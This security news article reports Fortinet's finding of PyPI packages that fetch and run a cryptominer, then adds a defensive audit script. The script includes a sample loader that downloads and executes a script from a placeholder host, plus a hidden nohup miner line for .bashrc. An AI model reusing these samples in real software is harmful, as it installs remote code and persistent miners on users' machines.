New PyPI Packages Deploying Cryptominers Discovered
On December 5, 2023, Fortinet researcher Gabby Xiong discovered three PyPI packages that deploy a cryptominer on Linux systems. The packages, authored by "sastra" and named 'modularseven-1.0,' 'driftme-1.0,' and 'catme-1.0,' were uploaded from a newly created PyPI account shortly after that account was registered. Analysis of the packages also established a link to a previously identified cryptomining Python package known as "Culturestreak."
Fortinet's investigation into these packages revealed a familiar attack pattern, as the packages "conceal their payload, effectively reducing the detectability of their malicious code by hosting it on a remote URL. The payload is then incrementally released in various stages to execute its malicious activities." The attack begins with an innocuous "import" statement in the package's __init__.py file, which hands control to a chain of scripts and processes that download additional payloads, alter file permissions, and execute the downloaded content. Among the files fetched by the "unmi.sh" script were "config.json," a configuration file holding the cryptocurrency mining settings, and a CoinMiner executable. Once the miner was downloaded and launched, the attacker used the "nohup" command so that the process kept running quietly in the background and survived the end of the terminal session. "The most deceptive aspect is that the attacker ensures that all these modifications are appended to the ~/.bashrc file, ensuring the reactivation of this malicious activity whenever the user initiates a new Bash shell session," Xiong explains.
While these packages shared similarities with "Culturestreak," including overlapping indicators of compromise (IoCs) and the same approach to hosting the coin mining executables, they introduced additional evasion tactics. Specifically, the critical commands for the malicious operations were moved into the "unmi.sh" file on a remote server, and the code left inside the PyPI packages themselves was kept to a minimum, giving detection solutions less to inspect. Fortinet's research emphasized the importance of detecting the subtle behaviors that indicate a potential compromise.
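The two behaviours described above, a package `__init__.py` that downloads, chmods and executes remote content, and a backgrounded `nohup` job appended to `~/.bashrc`, can both be audited for with simple heuristics. The following is an added example written for this page, not Fortinet's or the packages' own code; the regex patterns, the hypothetical `audit_site_packages` helper, and the sample `__init__.py` and `.bashrc` contents are all constructed here.

```python
"""Added example (not Fortinet's code): heuristic audit for the behaviours the
article describes. Sample inputs are constructed, not from the real packages."""
from __future__ import annotations
import re
from pathlib import Path

# Stage indicators for a download -> chmod -> execute loader in __init__.py
INIT_PATTERNS = {
    "remote_fetch": re.compile(r"urllib\.request|requests\.get|\bcurl\b|\bwget\b"),
    "perm_change": re.compile(r"os\.chmod|chmod \+x"),
    "exec": re.compile(r"subprocess\.|os\.system|os\.popen"),
}
# Indicators of a background job re-launched from ~/.bashrc on every new shell
BASHRC_PATTERNS = {
    "background_launch": re.compile(r"\bnohup\b.*&\s*$"),
    "hidden_path": re.compile(r"/tmp/\.|/dev/shm/|\$HOME/\.\w+/"),
}

def score_init(source: str) -> list[str]:
    """Names of the stage indicators present in source; all three together
    is the chain the article describes."""
    return [name for name, rx in INIT_PATTERNS.items() if rx.search(source)]

def suspicious_bashrc_lines(text: str) -> list[str]:
    """Lines that start a backgrounded nohup job or reference hidden/temp paths."""
    return [ln.strip() for ln in text.splitlines()
            if any(rx.search(ln) for rx in BASHRC_PATTERNS.values())]

def audit_site_packages(root: Path) -> dict[str, list[str]]:
    """Report every __init__.py under root (e.g. site-packages) hitting all stages."""
    findings: dict[str, list[str]] = {}
    for init in root.rglob("__init__.py"):
        try:
            hits = score_init(init.read_text(errors="ignore"))
        except OSError:
            continue  # unreadable file: skip rather than abort the whole scan
        if len(hits) == len(INIT_PATTERNS):
            findings[str(init)] = hits
    return findings

# Constructed sample mirroring the staged loader (placeholder URL, not the real one)
SAMPLE_INIT = """import os, subprocess, urllib.request
urllib.request.urlretrieve("http://PLACEHOLDER.invalid/unmi.sh", "/tmp/.u.sh")
os.chmod("/tmp/.u.sh", 0o755)
subprocess.Popen(["/tmp/.u.sh"])"""
# Constructed ~/.bashrc: one appended persistence line among ordinary entries
SAMPLE_BASHRC = """export PATH=$HOME/bin:$PATH
nohup $HOME/.cache/.m/miner -c $HOME/.cache/.m/config.json >/dev/null 2>&1 &
alias ll='ls -la'"""
```

For a live check, call `audit_site_packages(Path(sysconfig.get_paths()["purelib"]))` and `suspicious_bashrc_lines(Path.home().joinpath(".bashrc").read_text())`; a hit on all three stages in one `__init__.py`, or a `nohup ... &` line in `.bashrc`, is worth a manual look rather than an automatic verdict.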